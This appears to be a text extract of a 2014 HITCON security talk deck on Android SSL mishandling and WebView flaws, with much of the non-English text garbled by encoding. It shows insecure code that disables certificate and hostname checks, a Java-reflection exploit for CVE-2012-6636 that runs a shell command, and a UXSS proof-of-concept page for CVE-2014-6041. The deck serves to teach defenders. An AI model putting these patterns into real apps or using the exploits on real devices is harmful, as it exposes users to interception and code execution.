[2014/10/06] HITCON Freetalk - App Security on Android

App Security on Android 岑志豪 Anfa Sam [email protected] Ꮦ˃੒ဧٰ΅Ϟࠢʮ̡

⾓ᐚႽᙜయ֞ጥ┧

أⰐ Ø စᖤྭᴟ⁰෇ḑṆ⨭㡦˥Ⲃ୷өḑⱬ㐘ឿʲᗘ㍷Ƣ㉐ ḋ␹ʵ◚ḑ␑ཡơԻ෇ൻḑ୷өݞ㐘㡦⾱Ⲃʬ▪Βᴟ ␹ḑစᖤጚ㍝ࢢ㐹㋵ᵑˆƢ Ø ̗ৠḑⱬ⁰࿝ϰ௡⻝።ḑ"OESPJE୷ө㐹㋵͵ϫ⯎ኯ㡦 ₳⃶ᣩដዅ๪㞨ḋᴚḑ㡦ሟᇌ␹٩̩๪㞨՗ᴟ㡦㉐ḋ ␹⮦ਗًͮЦ㊣ↂƢ 6

ᐥⴢℨỉᆲⰘỉ∺ॊ Ø ៮❾ Ø (PPHMF1MBZྭᴟݘ൮ Ø ㉐ḋݘ╹ˏᄛΩḑྭᴟ⁰෇ Ø ʵ៮❾ Ø
ℨʱታྭᴟݘ൮ Ø Ιᙘʵኯḑ༃༦ྭᴟ⁰෇ 7

*OTVGGJDJFOU5SBOTQPSU-BZFS1SPUFDUJPO  㦊Ԗ⽑ಽ҆ⴤͪ⸬㦋 Ø စᖤྭᴟ⁰෇ࢢѡ⻿ሪ༲⳽ቛዏ˂፫Βᴟ44-࿡ӱ̝ ֥ஞታ෇Ƣሟᇌ␹٩̩⼟⨭⋣ⶦṌ⒀࿡␹.*5.ሟᇌ ⃮ٕᖤሪ⳽⭠Ƣ Ø Νਗ⋣ⶦペ⨭ơᖤሪ⳽⭠㏣㍷ơḊӧ㏣㍷℻℻Ƣ 9

10 чᷗ⓱ Ўᐎࣞ 1. Client Hello 2. Server Hello 3.
Certiﬁcate 4. ServerHelloDone 5. ClientKeyExchange 6. ChangeCipherSpec 7. Handshake Finished 8. ChangeCipherSpec 9. Handshake Finished 10. Application Data (HTTP) 11. Application Data (HTTP) Server Authentication SSL 加密連線  handshake 過程

ᏨݟУ؂ኜኯᗇ hʔ̥݊ࠅீཀ44-̋੗ஹᇞఱึτΌ hცࠅᏨݟУ؂ኜהԴٙ͜ኯᗇ݊щ̙ቦΥج 11

Attacker Victim 中間⼈人攻擊 (Man-In-The-Middle Attack) 12 Server

44-PO"OESPJE

1SFJOTUBMMFE44-3PPU$" 15

44-͡♢чᷗጫ๿ 16 ! URL url = new URL("https://wikipedia.org"); URLConnection urlConnection
= url.openConnection(); InputStream in = urlConnection.getInputStream(); ! … ! WebView mWebView = (WebView) ﬁndViewById(R.id.webView); mWebView.loadUrl("https://wikipedia.org");

ျⴃᚇᒩ Ø ≕⊶㏰⭶௡ፎ௏͙ፖࠨྃⱍ͵ᗏᏱ Ø ྃⱍፒሧơ͙ፖࠨ⭶ஂᙏᾉ௡ⓗᙏബΒᴟ֥ஞ⼙⌀ Ø ྃⱍᩜሧ㡦ըፎघ⨭ᬿஂԻቆ࿡⼟ӧΝ৖⢦᱙㡦㉐ḋ␹☬ʵ֥̩⢦᱙㡦⼙⌀ፎ⩰ˆቱᩜ᝖⍿⎊⼟⨭ Ø Βᴟ㏰⭶⭶ஂ␽ᩜ᝖⼐⼱ྃⱍᗏᏱḑػࡻ
Ø ͙ፖࠨ⭶ஂፒ⯉ Ø ᐦྃⱍ፫㏰⪓՚⪓⏀ʲ Ø ӱ̝ FY╹⨭⇗ḋ ྃⱍ⼱። ⋣ऄٽ₊ʵℤ 17

㍱ể⓱૏Уऱၥ Ø ႏ᪊≕⊶ػ፭㏰⭶ḑឪ⁰㡦Ⲃ⼙⌀ˆቱ Ø ๢ᵊྃⱍ⩰Փቱ᨟ᩜሧḑⱤگ㡦Ⲃ⼙⌀⍿⎊घ⨭ Ø ╹⨭௏ྃⱍ͵ᗏᏱ FYྃⱍ⋀ஂ 18 ref:
http://devco.re/blog/2014/08/15/ssl-mishandling-on-mobile-app-development/

44-ࠔ㔹Ѡ♉Ꭳ⿦ఎक़ 19 ref: http://www.zdnet.com/hundreds-of-android-apps-open-to-ssl-linked-intercept-fail-7000033365/

20 ref: http://www.kb.cert.org/vuls/id/582497

ܠ᪣ỉྤ៼ Ø ٍ␷⳽ⅆፎÓൖʲ؍ൖ▄᧫㐹㌪"11ḍ෠Ôृگ Ø ٩Ωʳ⹶ḑ"OESPJE"QQቆぞ㡩 ‣ ୖࢢ44-㐹㋵㡩 ‣ ℨʱታԻ෇ൻ෋ⵍ㡩 21
ref: http://www.ﬁnd.org.tw/ﬁnd/home.aspx?page=many&id=385

чᷗ44-⿏⎸ᎇ෤⯊ỉ  ㉌Ɀ⥝ᴑ

෤⯊㉌Ɀ⥝ᴑPO3FDFJWFE4TM&SSPS 23 憑證被判斷為無效的 SSL 連線，藉由 handler.proceed() ⽽而繼續執⾏行 ! ! mWebView.setWebViewClient(new
WebViewClient() { @Override public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) { handler.proceed(); // Ignore SSL certiﬁcate errors } }); !

෤⯊㉌Ɀ⥝ᴑDIFDL4FSWFS5SVTUFE 24 TrustManager[] trustAllManager = new TrustManager[] { new X509TrustManager()
{ @Override public void checkClientTrusted(X509Certificate[] chain, String authType) { } ! @Override public void checkServerTrusted(X509Certificate[] chain, String authType) { } ! @Override public X509Certificate[] getAcceptedIssuers() { return null; } }}; ! SSLContext sslContext = SSLContext.getInstance("TLS"); sslContext.init(null, trustAllManager, null); 預設有實作 SSL 檢查的元件被置換成忽略 SSL 檢查的元件

෤⯊㉌Ɀ⥝ᴑTFU)PTUOBNF7FSJGJFS 25 ! URL url = new URL("https://www.example.com/"); HttpsURLConnection conn
= (HttpsURLConnection) url.openConnection(); ! conn.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); // or ... conn.setHostnameVerifier(new HostnameVerifier() { @Override public boolean verify(String hostname, SSLSession session) { return true; } }); 不作核對，容許所有主機名稱通過檢查

44-PO"OESPJE Ø ㉐ḋ␹ Ø ׁ฿ჹᴟ֥ஞ⼙⌀ѡ⺛ᖤሪ⳽⭠ Ø ࡟ᐩЦ਒௏͙ፖࠨྃⱍḑᗏᏱ Ø ≕⊶㏰⭶ Ø
ྃⱍ⋀ஂ DFSUJGJDBUFQJOOJOH Ø ٤஖⭸ࢢ㉐ḋ㋡ᚃ๢ᵊྃⱍᗏᏱ Ø ᝥ༦ΒᴟḑℨʱታԻ෇ൻዅڑୖࢢݞ㐘 Ø Βᴟ␹ Ø ⽙ӘΒᴟӬẐॆ࿼࿼ᄛΩḑᩜ⌀⋣ⶦ Ø ⽙ӘΒᴟ֥ஞ෠൷⹱ොḑᩜ⌀⋣ⶦ FY8&1 81" 26

8FC7JFXయ֞ࠔ㔹

8FC7JFX Ø ᴨ≕⊶࿼ᄛΩ㡦ᴟት㐳ῠ⋣㏣ḑӏ̳ Ø ٩घ⨭+BWB4DSJQU ㏰⭶㊋㉏ Ø ٩⋍ᴨᆼ஺Ⲃ⋣㏣▎ػᴚ⁰෇͵⳽ቛѡ⼿ 28

BEE+BWBTDSJQU*OUFSGBDF ᨟⋣㏣ᄛΩ+BWB4DSJQUჽٞ㡦Ⲃ⋣㏣٩̩ۍ٥ػᴚ⁰෇ˆ ㏰Ӕ⌋஺਒ḑԻቆ 29 class JsObject { public String toString()
{ return "Hello World"; } } ! webView.getSettings().setJavaScriptEnabled(true); webView.addJavascriptInterface(new JsObject(), "injectedObject"); webView.loadUrl("http://www.example.com/"); ! <html> <head>… <script> alert(injectedObject.toString()); </script> </head> <body>…</body> </html> Hello World

8FC7JFX἖㎬  ෤⯊ᦡᡂ

$7& Ø ٖข㏡≕⊶㡩"OESPJE_9 Ø 8FC7JFXˆḑBEE+BWBTDSJQU*OUFSGBDFԻቆᜥፒ⩰⽆ ᵑḑ㊶՟㡦ௐ╿ሟᇌ␹ፒᖤፎ⼈⼱+BWB3FGMFDUJPO "1*घ⨭̵༦ԻቆƢ 31

$7&㕚㐖ℨ๿⁃ 32 ! <script> function execute(cmdArgs) { return injectedObject.getClass().forName("java.lang.Runtime") .getMethod("getRuntime",null)
.invoke(null,null).exec(cmdArgs); } execute(["/system/bin/sh","-c","cat vuln >> attacker.txt"]); </script> Java Reﬂection API

$7&๲ⴢ Ø ㉐ḋ␹ Ø ⽙Ә㉐ݧ+BWB4DSJQU֤ⓗ Ø ⽙Ә8FC7JFX⹶ӧ༃༦Ө஖ Βᴟ)5514 ٤ⱶٕ፭ࢩ)5.-
Ø ࢢ9࿡̩ʲᬝ፭Βᴟዏ⬋᨟Իቆᕵ⭽!+BWBTDSJQU*OUFSGBDF Ø ⽙Әࢢ9࿡̩ʳᬝ፭ḑ≕⊶ʲΒᴟBEE+BWBTDSJQU*OUFSGBDFԻቆ Ø Βᴟ␹ Ø ≕⊶ፄቭ╾9࿡̩ʲᬝ፭ Ø ⽙Ә㉐ݧʵኯΙᙘḑ⋣ࢮ Ø ჹᴟ̩㍳Өය8FC7JFX 8FC,JU ͵᨟ᐥ฾ḑᦫ⬲ࠨ 33

$7& Ø ٖข㏡≕⊶㡩"OESPJE9_9 Ø 8FC7JFXӏ̳╹പᄛΩٽ᨟ ÓTFBSDI#PY+BWB#SJEHF@Ôḑ+BWBTDSJQU*OUFSGBDF㡦ௐ ╿፫ˏֽΒᴟBEE+BWBTDSJQU*OUFSGBDF֤ⓗḑ⁰෇˥ ፒᖤፎ⩰ሟᇌ␹घ⨭̵༦ḑԻቆƢ 34

Ø ௏ᬝ፭9_9ḑ≕⊶ΒᴟSFNPWF+BWBTDSJQU*OUFSGBDFံ ÓTFBSDI#PY+BWB#SJEHF@Ô⼏ϫ̘㍷⁨㋃ Ø Βᴟ␹ Ø ≕⊶ፄቭ╾9࿡̩ʲᬝ፭ Ø ⽙Ә㉐ݧʵኯΙᙘḑ⋣ࢮ Ø ჹᴟ̩㍳Өය8FC7JFX 8FC,JU ͵᨟ᐥ฾ḑᦫ⬲ࠨ Ø FY$ISPNF 'JSFGPY 0QFSB 35

%&.0⍓ᑷ Ø ⊛ٸ44-ݞ㐘▎BEE+BWBTDSJQU*OUFSGBDFᣩដ㡦ᵑΒ ᴟ␹㋐ӧ.*5.ሟᇌዏ㡦Ṟ㊋စᖤྭᴟ⁰෇ᘐ㊶أ⩰ ሟᇌ␹ٕผ㡦˂٩ჾ՟စᖤ 37

$7& Ø ٖข㏡≕⊶㡩"OESPJE_9 Ø 8FC7JFXࢢ⢦᱙401 4BNF0SJHJO1PMJDZ ዏୖࢢᣩ ដ㡦ሟᇌ␹⼐⼱םږ=V୕ӏḑఋ຀㡦أ٩⍧ ⼱401ٕผӱ̝Ιᢋḑ⳽ቛ 38

39 測試 URL: http://devstd.in/cve/2014-6041/ 測試環境: Android 4.1.1 ! <html> <head>
<title>CVE-2014-6041 UXSS DEMO</title> </head> <body> <iframe name="target_frame" src="http://devco.re/"></iframe> <br /> <input type="button" value="go" onclick="window.open('\u0000javascript:alert(document.body.innerHTML)', 'target_frame')" /> </body> </html>

40 UC Browser HD  3.4.1.483 CM Browser  5.0.74 Maxthon Browser 
4.3.2.2000 測試結果

Ø ᖤሪDPPLJFׁ฿⭶ஂ᨟)UUQ0OMZ ͙ፖࠨ℀ Ø Βᴟ␹ Ø ≕⊶ፄቭ╾9࿡̩ʲᬝ፭ Ø ⽙Ә㉐ݧΙᙘʵኯḑ⋣ࢮ Ø ჹᴟ̩㍳Өය8FC7JFX 8FC,JU ͵᨟ᐥ฾ḑᦫ⬲ࠨ Ø FY$ISPNF 'JSFGPY 0QFSB 41

຺㔂∺ॊ 42 CVE-2012-6636 CVE-2014-1939 CVE-2014-6041 Android 2.X vulnerable non-vulnerable non-vulnerable
Android 3.X vulnerable vulnerable non-vulnerable Android 4.0.X vulnerable vulnerable vulnerable Android 4.1.X vulnerable vulnerable vulnerable Android 4.2.X non-vulnerable non-vulnerable vulnerable Android 4.3.X non-vulnerable non-vulnerable vulnerable Android 4.4.X non-vulnerable non-vulnerable non-vulnerable

"OESPJEᐥᯕ׷И 43

Ø Ղכ๢⬙ᚖϫᣩដḑข㏡֣㡛ʵټᣩដ⊓ٸ⼮ᴟท㡦 ء஑௉⽀য়ት̝ϰٵ╹ḑข㏡Ƣ Ø ஂዏᝥ༦ᗏ⬙╹ஔᴜ܃ዅڑጴ㍝ት㐹㋵ˆ㡦˂ࢢᴜ܃ ずԺ˘խ⼟⨭୷өᡄ⮜Ƣ Ø ሢ൱ᖤ㊋ơᓹˏࢢ՟⭛"QQ㉐ḋ⬕ᐩዏ㡦฿㏪␷ཪ
⳽୷㐹㋵㡦˂ʺஂ⏯"QQፌͧሗᄺᬝ፭㡦⽙ӘࡻṞ ஖░ᬝ෋ḋ୷өݞ㐘Ƣ 44

[2014/10/06] HITCON Freetalk - App Security on Android

[2014/10/06] HITCON Freetalk - App Security on Android

More Decks by DEVCORE

Other Decks in Technology

Featured

Transcript